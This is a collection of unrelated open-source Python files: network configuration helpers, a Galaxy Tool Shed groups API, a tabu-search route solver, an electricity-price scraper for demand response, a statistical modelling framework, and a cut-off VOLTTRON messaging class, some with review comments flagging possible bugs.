    # `with` ensures the handle is closed even if the write fails
    with open(ARMORE_CFG_FILE, 'w') as newConfigFile:
        newConfigFile.write("".join(lines))
    # .get() avoids the KeyError the previous direct indexing raised when
    # either side lacked the management-IP entry
    oldIp = oldConfig.get("Management_IP")
    newIp = config.get("Management", {}).get("IP")
    return bool(oldConfig) and oldIp != newIp
def writeProxyConfig(config):
    """Rewrite PROXY_CFG_FILE keeping its first 3 header lines, then `key = value` pairs.

    Falsy values in `config` are dropped.  Restarts the proxy afterwards.
    """
    # BUG FIX: the original called readlines() twice on the same handle; the
    # second call always returned [] because the file was already at EOF.
    # Read once and slice.
    with open(PROXY_CFG_FILE, 'r') as oldConfigFile:
        allLines = oldConfigFile.readlines()
    headerLines = allLines[:3]
    # keep only truthy values
    newConfig = {c: config[c] for c in config if config[c]}
    with open(PROXY_CFG_FILE, 'w') as newConfigFile:
        for l in headerLines:
            newConfigFile.write(l)
        newConfigFile.write('\n')
        for c in newConfig:
            newConfigFile.write("{0} = {1}\n".format(c, newConfig[c]))
    restartProxy()
def enforceArmoreConfig():
    """Push the IPs from the armore config onto the actual interfaces.

    Returns 0 (without touching anything) when no config exists.
    """
    config = getArmoreConfig()
    if not config:
        return 0
    ipAddrs = {}
    intTypes = ["Management", "External", "Internal"]
    for intType in intTypes:
        keyInt = intType + "_Interface"
        keyIp = intType + "_IP"
        if keyInt in config and keyIp in config:
            ipAddrs[config[keyInt]] = config[keyIp]
        else:
            # NOTE(review): this fallback runs once per MISSING interface
            # type, overwriting eth0's entry each time -- confirm it was not
            # meant to apply only when no interface at all is configured
            ipAddrs["eth0"] = '127.0.0.1'
    netLib.setIps(ipAddrs)
def updateIpAddrs(ipAddrsConfig):
    """Apply interface->IP assignments from `ipAddrsConfig` via netLib.

    Each value is expected to be a dict with 'Interface' and 'IP' keys; the
    bookkeeping 'Operation' entry is ignored.
    """
    # pop() with a default: no KeyError when 'Operation' is absent
    # (still mutates the caller's dict, exactly as the original `del` did)
    ipAddrsConfig.pop("Operation", None)
    ipAddrs = {}
    for intType in ipAddrsConfig:
        ipAddrs[ipAddrsConfig[intType]["Interface"]] = ipAddrsConfig[intType]["IP"]
    netLib.setIps(ipAddrs)
# Writes template information into /etc/network/interfaces file based on the mode selected
def writeInterfacesFile(config, configType):
    """Render the mode-specific network template into /etc/network/interfaces."""
    writeTemplate(config, netFiles[configType], "/etc/network/interfaces")
    #comLib.cmd("service networking restart")
# Gets current mode of operation based on backend
def getOperationMode():
    """Return the Operation value from /etc/armore/armoreconfig.

    Returns None when no line mentions 'Operation'.
    """
    with open("/etc/armore/armoreconfig", 'r') as f:
        for l in [x.rstrip() for x in f.readlines()]:
            if re.search("Operation", l):
                # split on the first '=' only; values containing '='
                # previously made the unpacking raise ValueError
                _, value = l.replace(" ", "").split("=", 1)
                return value
# Called when ARMORE first starts to ensure config files exist and are synched with backend properly
def createArmoreModeConfigFiles(supportFilePath="/var/webServer/supportFiles.txt"):
    """Create any missing mode config files, seeded from the backend config.

    Called when ARMORE first starts so the webServer config files exist and
    agree with the backend.  Missing values fall back to hard-coded defaults.
    """
    configs = [
        "ArmoreConfig",
        "ProxyConfig",
        "TransparentConfig",
        "PassiveConfig"
    ]
    print("# Creating Config Files")
    backendConfig = getArmoreConfigBackend()
    intIpsDict = netLib.getInterfaceIps()
    for c in configs:
        cPath = comLib.getSupportFilePath(c, supportFilePath)
        ctPath = comLib.getSupportFilePath("{}Template".format(c), supportFilePath)
        if not os.path.exists(cPath):
            theDict = {}
            currConfig = getArmoreConfig()  # NOTE(review): unused -- confirm
            if c == "ArmoreConfig":
                theDict["managementIp"] = backendConfig.get("ManagementIp")
                theDict["managementMask"] = backendConfig.get("ManagementMask")
                theDict["managementInterface"] = backendConfig.get("ManagementInt")
                intsUsed = [backendConfig.get("ManagementInt")]
                # first interface not already used becomes the internal one
                intToUse = ""
                for i in intIpsDict:
                    if i not in intsUsed:
                        intToUse = i
                        intsUsed.append(i)
                        break
                # NOTE(review): if no unused interface exists, intToUse stays
                # "" and intIpsDict[""] below raises KeyError -- confirm
                theDict["internalIp"] = intIpsDict[intToUse]
                theDict["internalMask"] = netLib.getNetmaskFromInt(intToUse)
                theDict["internalInterface"] = intToUse
                # next unused interface becomes the external one
                for i in intIpsDict:
                    if i not in intsUsed:
                        intToUse = i
                        intsUsed.append(i)
                        break
                theDict["externalIp"] = intIpsDict[intToUse]
                theDict["externalMask"] = netLib.getNetmaskFromInt(intToUse)
                theDict["externalInterface"] = intToUse
                theDict["operation"] = getOperationMode()
            elif c == "ProxyConfig":
                if backendConfig.get("Operation") == "Proxy":
                    theDict["roleType"] = backendConfig.get("Roletype")
                    theDict["port"] = backendConfig.get("Port")
                    theDict["bind"] = backendConfig.get("Bind")
                    theDict["capture"] = backendConfig.get("Capture")
                    theDict["encryption"] = backendConfig.get("Encryption")
                    theDict["firewall"] = backendConfig.get("Firewall")
                    theDict["interface"] = backendConfig.get("Interface")
                else:
                    # defaults when the backend is not currently in Proxy mode
                    theDict["roleType"] = "Server"
                    theDict["port"] = "5555"
                    theDict["bind"] = "127.0.0.2"
                    theDict["capture"] = "NetMap"
                    theDict["encryption"] = "Enabled"
                    theDict["firewall"] = "Disabled"
                    theDict["interface"] = "eth1"
            elif c == "TransparentConfig":
                theDict["netmask"] = "255.255.255.0"
                theDict["broadcastIp"] = "127.0.0.2"
                theDict["bridgeIp"] = "127.0.0.3"
                theDict["interface1"] = "eth1"
                theDict["interface2"] = "eth2"
                theDict["gateway"] = "127.0.0.1"
                theDict["route"] = "127.0.0.1/8"
            elif c == "PassiveConfig":
                theDict["monitored_interface"] = "eth1"
            writeTemplate(theDict, ctPath, cPath)
            '''
            t = open(ctPath, 'r')
            temp = Template(t.read())
            t.close()
            f = open(cPath, 'w')
            f.write(temp.substitute(theDict))
            f.close()
            '''
|
# lib/galaxy/webapps/tool_shed/api/groups.py
import logging
from galaxy import util
from galaxy import web
from galaxy.util import pretty_print_time_interval
from galaxy.exceptions import RequestParameterMissingException
from galaxy.exceptions import AdminRequiredException
from galaxy.exceptions import ObjectNotFound
from galaxy.web import require_admin as require_admin
from galaxy.web import _future_expose_api as expose_api
from galaxy.web import _future_expose_api_anonymous_and_sessionless as expose_api_anonymous_and_sessionless
from galaxy.web.base.controller import BaseAPIController
from tool_shed.managers import groups
log = logging.getLogger( __name__ )
class GroupsController( BaseAPIController ):
    """RESTful controller for interactions with groups in the Tool Shed."""

    def __init__( self, app ):
        super( GroupsController, self ).__init__( app )
        self.group_manager = groups.GroupManager()

    def __get_value_mapper( self, trans ):
        # encode numeric DB ids before they are exposed through the API
        value_mapper = { 'id' : trans.security.encode_id }
        return value_mapper

    @expose_api_anonymous_and_sessionless
    def index( self, trans, deleted=False, **kwd ):
        """
        GET /api/groups
        Return a list of dictionaries that contain information about each Group.

        :param deleted: flag used to include deleted groups

        Example: GET localhost:9009/api/groups
        """
        group_dicts = []
        deleted = util.asbool( deleted )
        if deleted and not trans.user_is_admin():
            raise AdminRequiredException( 'Only administrators can query deleted groups.' )
        for group in self.group_manager.list( trans, deleted ):
            group_dicts.append( self._populate( trans, group ) )
        return group_dicts

    @expose_api
    @require_admin
    def create( self, trans, payload, **kwd ):
        """
        POST /api/groups
        Return a dictionary of information about the created group.
        The following parameters are included in the payload:

        :param name (required): the name of the group
        :param description (optional): the description of the group

        Example: POST /api/groups/?key=XXXYYYXXXYYY
        Content-Disposition: form-data; name="name" Group_Name
        Content-Disposition: form-data; name="description" Group_Description
        """
        group_dict = dict( message='', status='ok' )
        name = payload.get( 'name', '' )
        if name:
            description = payload.get( 'description', '' )
            if not description:
                description = ''
            else:
                # NOTE(review): the group is only created on this else branch,
                # i.e. when a description was supplied; with no description the
                # placeholder dict above is returned unchanged -- confirm this
                # is intended
                # TODO add description field to the model
                group_dict = self.group_manager.create( trans, name=name ).to_dict( view='element', value_mapper=self.__get_value_mapper( trans ) )
        else:
            raise RequestParameterMissingException( 'Missing required parameter "name".' )
        return group_dict

    @expose_api_anonymous_and_sessionless
    def show( self, trans, encoded_id, **kwd ):
        """
        GET /api/groups/{encoded_group_id}
        Return a dictionary of information about a group.

        :param id: the encoded id of the Group object

        Example: GET localhost:9009/api/groups/f9cad7b01a472135
        """
        decoded_id = trans.security.decode_id( encoded_id )
        group = self.group_manager.get( trans, decoded_id )
        if group is None:
            raise ObjectNotFound( 'Unable to locate group record for id %s.' % ( str( encoded_id ) ) )
        return self._populate( trans, group )

    def _populate( self, trans, group ):
        """
        Turn the given group information from DB into a dict
        and add other characteristics like members and repositories.
        """
        model = trans.app.model
        group_dict = group.to_dict( view='collection', value_mapper=self.__get_value_mapper( trans ) )
        group_members = []
        group_repos = []
        total_downloads = 0
        for uga in group.users:
            user = trans.sa_session.query( model.User ).filter( model.User.table.c.id == uga.user_id ).one()
            user_repos_count = 0
            # repositories owned by this member, joined with metadata,
            # categories and reviews for display purposes
            for repo in trans.sa_session.query( model.Repository ) \
                    .filter( model.Repository.table.c.user_id == uga.user_id ) \
                    .join( model.RepositoryMetadata.table ) \
                    .join( model.User.table ) \
                    .outerjoin( model.RepositoryCategoryAssociation.table ) \
                    .outerjoin( model.Category.table ):
                categories = []
                for rca in repo.categories:
                    cat_dict = dict( name=rca.category.name, id=trans.app.security.encode_id( rca.category.id ) )
                    categories.append( cat_dict )
                time_repo_created_full = repo.create_time.strftime( "%Y-%m-%d %I:%M %p" )
                time_repo_updated_full = repo.update_time.strftime( "%Y-%m-%d %I:%M %p" )
                time_repo_created = pretty_print_time_interval( repo.create_time, True )
                time_repo_updated = pretty_print_time_interval( repo.update_time, True )
                approved = ''
                ratings = []
                for review in repo.reviews:
                    if review.rating:
                        ratings.append( review.rating )
                    if review.approved == 'yes':
                        approved = 'yes'
                # TODO add user ratings
                ratings_mean = str( float( sum( ratings ) ) / len( ratings ) ) if len( ratings ) > 0 else ''
                total_downloads += repo.times_downloaded
                group_repos.append( { 'name': repo.name,
                                      'times_downloaded': repo.times_downloaded,
                                      'owner': repo.user.username,
                                      'time_created_full': time_repo_created_full,
                                      'time_created': time_repo_created,
                                      'time_updated_full': time_repo_updated_full,
                                      'time_updated': time_repo_updated,
                                      'description': repo.description,
                                      'approved': approved,
                                      'ratings_mean': ratings_mean,
                                      'categories' : categories } )
                user_repos_count += 1
                encoded_user_id = trans.app.security.encode_id( repo.user.id )
                user_repos_url = web.url_for( controller='repository', action='browse_repositories_by_user', user_id=encoded_user_id )
            # NOTE(review): encoded_user_id/user_repos_url are only bound
            # inside the repository loop; a member with zero repositories
            # raises NameError here -- confirm
            time_created = pretty_print_time_interval( user.create_time, True )
            member_dict = { 'id': encoded_user_id, 'username': user.username, 'user_repos_url': user_repos_url, 'user_repos_count': user_repos_count, 'user_tools_count': 'unknown', 'time_created': time_created }
            group_members.append( member_dict )
        group_dict[ 'members' ] = group_members
        group_dict[ 'total_members' ] = len( group_members )
        group_dict[ 'repositories' ] = group_repos
        group_dict[ 'total_repos' ] = len( group_repos )
        group_dict[ 'total_downloads' ] = total_downloads
        return group_dict
|
# gh_stars: 100-1000
from itertools import combinations
import os,sys,copy
import numpy as np
import time
import matplotlib.pyplot as plt
from GetData import *
from tqdm import tqdm
class Tabu():
    """Tabu search for a TSP-style route over a distance matrix (node 0 = depot)."""

    def __init__(self,disMatrix,max_iters=50,maxTabuSize=10):
        """parameters definition

        disMatrix   : square matrix of pairwise distances
        max_iters   : iteration budget (consumed in place by tabu_search)
        maxTabuSize : maximum number of entries kept in the tabu list
        """
        self.disMatrix = disMatrix
        self.maxTabuSize = maxTabuSize
        self.max_iters = max_iters
        self.tabu_list=[]

    def get_route_distance(self,route):
        '''
        Description: function to calculate total distance of a route. evaluate function.
        parameters: route : list
        return : total distance : float
        '''
        routes = [0] + route + [0] # add the start and end point
        total_distance = 0
        for i,n in enumerate(routes):
            if i != 0 :
                total_distance = total_distance + self.disMatrix[last_pos][n]
            last_pos = n  # always set, so defined before first use above
        return total_distance

    def exchange(self,s1,s2,arr):
        """
        function to Swap positions of two elements in an arr
        Args: int,int,list
            s1 : target 1
            s2 : target 2
            arr : target array
        Output: list
            current_list : copy of arr with s1 and s2 swapped
        """
        current_list = copy.deepcopy(arr)
        index1 , index2 = current_list.index(s1) , current_list.index(s2) # get index
        current_list[index1], current_list[index2]= arr[index2] , arr[index1]
        return current_list

    def generate_initial_solution(self,num=10,mode='greedy'):
        """
        function to get the initial solution,there two different way to generate route_init.
        Args:
            num : int
                the number of points
            mode : string
                "greedy" : advance step by choosing optimal one
                "random" : randomly generate a series number
        Output: list
            s_init : initial solution route_init
        """
        if mode == 'greedy':
            route_init=[0]
            for i in range(num):
                best_distance = 10000000
                # NOTE(review): indexes disMatrix by the loop counter i, not
                # by the last node appended to the route; also best_candidate
                # is unbound if no j qualifies -- confirm intended behavior
                for j in range(num+1):
                    if self.disMatrix[i][j] < best_distance and j not in route_init:
                        best_distance = self.disMatrix[i][j]
                        best_candidate = j
                route_init.append(best_candidate)
            route_init.remove(0)
        if mode == 'random':
            route_init = np.arange(1,num+1) #init solution from 1 to num
            np.random.shuffle(route_init) #shuffle the list randomly
        return list(route_init)

    def tabu_search(self,s_init):
        """tabu search

        Returns (s_best, routes): the best route found and the sequence of
        best candidates per iteration.  NOTE: consumes self.max_iters, so a
        second call on the same instance performs zero iterations.
        """
        s_best = s_init
        bestCandidate = copy.deepcopy(s_best)
        routes , temp_tabu = [] , [] # init
        routes.append(s_best)
        while(self.max_iters):
            self.max_iters -= 1 # Number of iterations
            neighbors = copy.deepcopy(s_best)
            for s in combinations(neighbors, 2):
                sCandidate = self.exchange(s[0],s[1],neighbors) # exchange number to generate candidates
                if s not in self.tabu_list and self.get_route_distance(sCandidate) < self.get_route_distance(bestCandidate):
                    bestCandidate = sCandidate
                    temp_tabu = s  # remember the move that produced the candidate
            if self.get_route_distance(bestCandidate) < self.get_route_distance(s_best): # record the best solution
                s_best = bestCandidate
            if temp_tabu not in self.tabu_list:
                self.tabu_list.append(temp_tabu)
            if len(self.tabu_list) > self.maxTabuSize :
                self.tabu_list.pop(0)
            routes.append(bestCandidate)
        return s_best, routes
if __name__ == "__main__":
    np.random.seed(2020)
    customerNum = 10  # number of customer nodes (excluding the depot)
    data = GetData()
    # Random locations on a 100x100 map; the extra point is the depot.
    tsp_data = data.generate_locations(num_points=customerNum + 1, map_size=100)
    dismatrix = data.get_euclidean_distance_matrix(tsp_data.locations)
    # data.plot_nodes(tsp_data.locations)
    # disMatrix[i][j] is the distance from node i to node j; node 0 is the
    # depot where every route starts and ends.
    tsp = Tabu(disMatrix=dismatrix, max_iters=20, maxTabuSize=10)
    # Two ways to build a starting route: mode = "greedy" or "random".
    s_init = tsp.generate_initial_solution(num=customerNum, mode='greedy')
    print('init route : ', s_init)
    print('init distance : ', tsp.get_route_distance(s_init))
    start = time.time()
    best_route, routes = tsp.tabu_search(s_init)
    end = time.time()
    print('best route : ', best_route)
    print('best best_distance : ', tsp.get_route_distance(best_route))
    print('the time cost : ', end - start)
    # Plot how the incumbent distance evolves over the iterations.
    distances = [tsp.get_route_distance(r) for r in routes]
    plt.plot(np.arange(len(distances)), distances)
    plt.show()
    # Plot the best closed tour.
    data.plot_route(tsp_data.locations, [0] + best_route + [0])
|
<reponame>flexbox-nicaragua/flexbox-code
# Copyright 2016 The Flexbox Authors. All rights reserved.
# Licensed under the open source MIT License, which is in the LICENSE file.
from bs4 import BeautifulSoup
import urllib2
import re
from datetime import datetime, timedelta
import pandas as pd
from sqlalchemy import cast,Date,text
from sqlalchemy.exc import IntegrityError
from flexbox import psql_server
# Fetch the CNDC (Nicaragua grid operator) pre-dispatch spreadsheet export.
# NOTE: this file is Python 2 (urllib2, print statements further down).
url = 'http://www.cndc.org.ni/Principal/PREDESPACHO_archivos/sheet002.htm'
try:
    response = urllib2.urlopen(url)
except:
    # The site alternates between Spanish and English folder names.
    response = urllib2.urlopen(url.replace('_archivos','_files'))
data = response.read()
soup = BeautifulSoup(data,"html5lib")
# Row 10 of the exported table holds the column headers; prepend an hour
# column, then truncate just past the 'IND' (price) column.
column_list = [header.text.encode('ascii','ignore') for header in soup.find('table').findAll('tr')[10].findAll('td')]
column_list.insert(0,'HORA')
column_list = column_list[:column_list.index('IND')+2]
# The data rows carry two extra columns (demand and pumping) that have no
# header cell, so insert placeholders before 'IND' to realign the indexes.
column_list.insert(column_list.index('IND'),'Demanda')
column_list.insert(column_list.index('IND'),'Bombeo')
prices = []
# Rows 11..34 are the 24 hourly rows; collect the 'IND' price of each.
for val in range(11,35):
    output_dict = {}
    row = [header.text.encode('ascii','ignore') for header in soup.find('table').findAll('tr')[val].findAll('td')][:len(column_list)]
    for i,column in enumerate(column_list):
        if column == 'IND':
            prices.append(float(row[i]))
# One datetime index per hour of today (midnight + 0..23 hours).
dt_indexes = []
for i in range(0,24):
    dt_indexes.append(datetime(datetime.now().year,
        datetime.now().month,datetime.now().day)+timedelta(hours=i))
pred_actual_prices = pd.DataFrame(prices,index=dt_indexes)
pred_actual_prices.columns = ['IND']
pred_actual_prices['date'] = pred_actual_prices.index.date
pred_actual_prices['hour'] = pred_actual_prices.index.hour
# Keep the scheduled ('programmed') price under its own column name.
pred_actual_prices['prog_ind'] = pred_actual_prices['IND']
###
### Beginning to choose the DR (demand-response) event for the next day
# NOTE: sub_date aliases pred_actual_prices (no copy), so the column
# assignments below mutate the original frame as well.
sub_date = pred_actual_prices
sub_date['rolling_rank3'] = [None] * len(sub_date['prog_ind'])
sub_date['rolling_rank2'] = [None] * len(sub_date['prog_ind'])
# Forward-looking rolling means of the hourly price: a 3-hour and a 2-hour
# window anchored at hour i, shrunk near the end of the day (i = 22, 23).
for i,val in enumerate(sub_date['prog_ind']):
    if i <= 21:
        sub_date['rolling_rank3'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1] + sub_date['prog_ind'][i+2])/3
        sub_date['rolling_rank2'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
    if i == 22:
        sub_date['rolling_rank3'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
        sub_date['rolling_rank2'][i] = (sub_date['prog_ind'][i] + sub_date['prog_ind'][i+1])/2
    if i == 23:
        sub_date['rolling_rank3'][i] = sub_date['prog_ind'][i]
        sub_date['rolling_rank2'][i] = sub_date['prog_ind'][i]
    else:
        pass
# Creating the rolling rank
sub_date_sorted = sub_date.sort_values(by='rolling_rank3',ascending=False)
##
## Choosing the event: the single peak hour vs. the best 3-hour and 2-hour
## windows, each tagged so the winner can be identified below.
highest_hour_price = sub_date[sub_date['prog_ind'] == max(sub_date['prog_ind'])][['prog_ind','hour']].rename(columns={'prog_ind':'price'})
highest_hour_price['event'] = 'hour'
three_hour_dr = sub_date[sub_date['rolling_rank3'] == max(sub_date['rolling_rank3'])][['rolling_rank3','hour']].rename(columns={'rolling_rank3':'price'})
three_hour_dr['event'] = 'three_hour'
two_hour_dr = sub_date[sub_date['rolling_rank2'] == max(sub_date['rolling_rank2'])][['rolling_rank2','hour']].rename(columns={'rolling_rank2':'price'})
two_hour_dr['event'] = 'two_hour'
highest_hour_price = highest_hour_price.append(three_hour_dr)
highest_hour_price = highest_hour_price.append(two_hour_dr)
max_price_event = highest_hour_price[highest_hour_price['event'] == 'hour']
# Hours covered by the candidate multi-hour windows (Python 2: range()
# returns lists, so `+` concatenates them).
two_three_dr_hours = range(highest_hour_price[highest_hour_price['event'] == 'three_hour']['hour'][0],highest_hour_price[highest_hour_price['event'] == 'three_hour']['hour'][0]+3)\
    + range(highest_hour_price[highest_hour_price['event'] == 'two_hour']['hour'][0],highest_hour_price[highest_hour_price['event'] == 'two_hour']['hour'][0]+2)
# Prefer the lone peak hour when it falls outside both windows; otherwise
# take whichever window has the higher mean price.
if max_price_event['hour'][0] not in two_three_dr_hours:
    event = highest_hour_price[highest_hour_price['event'] == 'hour']
elif highest_hour_price[highest_hour_price['event'] == 'three_hour']['price'][0] >= highest_hour_price[highest_hour_price['event'] == 'two_hour']['price'][0] :
    event = highest_hour_price[highest_hour_price['event'] == 'three_hour']
elif highest_hour_price[highest_hour_price['event'] == 'three_hour']['price'][0] < highest_hour_price[highest_hour_price['event'] == 'two_hour']['price'][0] :
    event = highest_hour_price[highest_hour_price['event'] == 'two_hour']
# Ties can select several rows; keep only the first.
if event.shape[0] > 1:
    event = event.head(1)
else:
    pass
# Hours beyond the starting hour implied by the chosen event type.
if event['event'][0] == 'hour':
    event['additional_hours'] = 0
elif event['event'][0] == 'two_hour':
    event['additional_hours'] = 1
elif event['event'][0] == 'three_hour':
    event['additional_hours'] = 2
else:
    pass
hours_list = list(range(event['hour'][0],event['hour'][0] + event['additional_hours'][0]+1))
hour_start = int(event['hour'][0])
duration = (event['additional_hours'][0]+1)*60
output_dict = {}
metadata = psql_server.get_metadata()
table_dict = psql_server.setup_tables(metadata_control)
output_dict = {}
output_dict['date'] = event.index.date[0]
output_dict['hour_start'] = hour_start
output_dict['datetime'] = datetime.combine(event.index.date[0],\
datetime.min.time())+timedelta(hours=hour_start)
output_dict['signal'] = 1
output_dict['duration_minutes']=duration
print output_dict
psql_server.add_values_to_table(table_dict['peak_shifting_dr_table'],output_dict) |
import numpy as np
import pandas as pd
from scipy import stats, optimize
import patsy
import prettytable
class Response(object):
    """Holds an observed count matrix `y` (rows = sites, columns = occasions).

    Kmin is the per-row maximum observed count — the smallest latent
    abundance consistent with the observations at each site.
    """

    def __init__(self, y):
        self.y = y
        self.Kmin = np.array([max(row) for row in y])
class Submodel(object):
    """One component (e.g. detection or state) of an unmarked model.

    Wraps a patsy formula plus the data it is evaluated against, and holds
    the fitted coefficients / covariance once the parent model has been fit
    (filled in via get_estimates / get_vcov).
    """

    def __init__(self, name, code, formula, invlink, data):
        self.name = name
        self.code = code
        self.formula = formula
        self.invlink = invlink
        self.data = data
        # Populated after optimization by get_estimates()/get_vcov().
        self.estimates = None
        self.vcov = None
        self.coefnames = self.get_coefnames()

    def dmatrix(self):
        """Design matrix for this submodel's formula evaluated on its data."""
        return patsy.dmatrix(self.formula, self.data)

    def get_coefnames(self):
        """Column names of the design matrix (one per coefficient)."""
        return self.dmatrix().design_info.column_names

    def npars(self):
        """Number of coefficients in this submodel."""
        return len(self.coefnames)

    def predict(self, transform=True, interval=True, level=95, beta=None):
        """Predicted values, optionally with a Wald interval.

        The interval is built on the link scale and back-transformed through
        the inverse link when `transform` is True. `level` may be given as a
        percentage (95) or a proportion (0.95).
        """
        level = level / 100 if level > 1 else level
        if beta is None:
            beta = self.estimates
        if beta is None:
            raise AttributeError("Model has not been fit yet")
        design = self.dmatrix()
        linpred = np.matmul(design, beta)
        if not interval:
            return self.invlink(linpred) if transform else linpred
        covmat = np.matmul(np.matmul(design, self.vcov), design.transpose())
        stderr = np.sqrt(covmat.diagonal())
        lower, upper = stats.norm.interval(level, loc=linpred, scale=stderr)
        result = pd.DataFrame({"Prediction": linpred, "lower": lower, "upper": upper})
        return self.invlink(result) if transform else result

    def get_vcov(self, opt):
        """Slice this submodel's covariance block from the inverse Hessian."""
        self.vcov = opt.hess_inv[self.index, :][:, self.index]

    def get_estimates(self, opt):
        """Slice this submodel's coefficients from the optimizer solution."""
        self.estimates = opt.x[self.index]

    def check_fit(self):
        """Raise AttributeError if the parent model has not been fit yet."""
        if self.estimates is None:
            raise AttributeError("Model has not been fit yet")

    def SE(self):
        """Standard errors of the coefficient estimates."""
        self.check_fit()
        return np.sqrt(self.vcov.diagonal())

    def confint(self, level=95):
        """Normal-approximation CI as a (lower, upper) pair of arrays."""
        level = level / 100 if level > 1 else level
        return stats.norm.interval(level, loc=self.estimates, scale=self.SE())

    def summary(self, level=95):
        """Pretty-print the coefficient table for this submodel."""
        level = level / 100 if level > 1 else level
        lower, upper = self.confint(level)
        table = prettytable.PrettyTable()
        table.add_column("Parameter", self.coefnames)
        table.add_column("Estimate", self.estimates.round(4))
        table.add_column("SE", self.SE().round(4))
        table.add_column("lower", lower.round(4))
        table.add_column("upper", upper.round(4))
        print(self.name + ": " + self.formula)
        print(table)

    def print(self, level=95):
        self.summary(level=level)

    def coeftable(self, level=95):
        """Coefficient table as a pandas DataFrame."""
        lower, upper = self.confint(level)
        return pd.DataFrame({"Model": np.repeat(self.code, len(self.coefnames)),
                             "Parameter": self.coefnames, "Estimate": self.estimates,
                             "SE": self.SE(), "lower": lower, "upper": upper})
class SubmodelDict(object):
    """Keyed collection of Submodels sharing one flat parameter vector.

    Each submodel is assigned a contiguous `index` range into the joint
    parameter vector, in the order the submodels were passed.
    """

    def __init__(self, **args):
        self.submodels = args
        offset = 0
        for key in self.submodels:
            sub = self.submodels[key]
            sub.index = offset + np.arange(len(sub.coefnames))
            offset += len(sub.index)

    def npars(self):
        """Total number of parameters across all submodels."""
        return sum(sub.npars() for sub in self.submodels.values())

    def get_estimates(self, opt):
        """Distribute the optimizer solution to every submodel."""
        for sub in self.submodels.values():
            sub.get_estimates(opt)

    def get_vcov(self, opt):
        """Distribute the covariance blocks to every submodel."""
        for sub in self.submodels.values():
            sub.get_vcov(opt)

    def summary(self, level=95):
        """Print each submodel's summary, separated by blank lines."""
        for sub in self.submodels.values():
            sub.summary(level=level)
            print("")

    def coeftable(self, level=95):
        """Concatenate all submodel coefficient tables into one DataFrame."""
        pieces = {key: sub.coeftable(level=level) for key, sub in self.submodels.items()}
        return pd.concat(pieces).reset_index(drop=True)

    def print(self, level=95):
        self.summary(level=level)
class UnmarkedModel(object):
    """Base class for unmarked (N-mixture style) models.

    Subclasses supply `response` (a Response), `submodels` (a SubmodelDict)
    and a concrete `negloglik`; fit() then minimizes the negative
    log-likelihood with BFGS and pushes estimates/covariances back into the
    submodels.
    """

    def __init__(self):
        # BUG FIX: the original signature was `def __init__():` (missing
        # `self`), so every instantiation raised TypeError.
        pass

    def __getitem__(self, arg):
        """Look up a submodel by its key, e.g. model['det']."""
        return self.submodels.submodels[arg]

    def negloglik(self, x, mod, K):
        """Negative log-likelihood; implemented by subclasses."""
        pass

    def fit(self, x0=None, tol=None, K=None):
        """Fit the model by BFGS.

        Args:
            x0: start values (default: all zeros).
            tol: gradient tolerance, passed as BFGS `gtol` (default scales
                with the number of rows in the response).
            K: upper bound for the latent abundance sum (default: max
                observed count + 20).
        """
        tol = 1e-6 * self.response.y.shape[0] if tol is None else tol
        #gtol = 1e-6 if gtol is None else gtol
        x0 = np.repeat(0, self.submodels.npars()) if x0 is None else x0
        K = self.response.y.max() + 20 if K is None else K
        # `self` goes through args so negloglik receives the model as `mod`.
        self.opt = optimize.minimize(self.negloglik, x0, (self, K), method="BFGS",
                                     options={"gtol": tol})
        self.opt.tol = tol
        self.opt.K = K
        self.submodels.get_estimates(self.opt)
        self.submodels.get_vcov(self.opt)

    def check_fit(self):
        """Raise AttributeError if fit() has not been called yet."""
        if 'opt' not in dir(self):
            raise AttributeError("Model has not been fit yet")

    def AIC(self):
        """Akaike information criterion: 2 * negloglik + 2 * npars."""
        self.check_fit()
        return 2 * self.opt.fun + 2 * self.submodels.npars()

    def summary(self, level=95):
        """Print coefficient tables for all submodels plus AIC/convergence."""
        self.submodels.summary(level=level)
        print("AIC: " + str(round(self.AIC(), 4)))
        print("Converged: " + str(self.opt.success))

    def coeftable(self, level=95):
        """Combined coefficient DataFrame across all submodels."""
        return self.submodels.coeftable(level=level)

    def predict(self, type, transform=True, interval=True, level=95):
        """Predict from the submodel named by `type` (the submodel key)."""
        return self[type].predict(transform=transform, interval=interval,
                                  level=level)

    def simulate(self):
        pass
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
'''VOLTTRON platform™ messaging classes.'''
from __future__ import absolute_import
import collections
import zmq
from zmq.utils import jsonapi
from .headers import Headers
__all__ = ['Headers', 'Socket']
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
class Socket(zmq.Socket):
    '''ØMQ socket with additional agent messaging methods.'''

    def __new__(cls, socket_type, context=None):
        # The context must be chosen before zmq.Socket is constructed;
        # default to the process-wide singleton context.
        if not context:
            context = zmq.Context.instance()
        return zmq.Socket.__new__(cls, context, socket_type)

    def __init__(self, socket_type, context=None):
        # self.context is readable here, presumably attached during
        # zmq.Socket.__new__ above — NOTE(review): confirm against the pyzmq
        # version in use. The `context` parameter only mirrors __new__'s
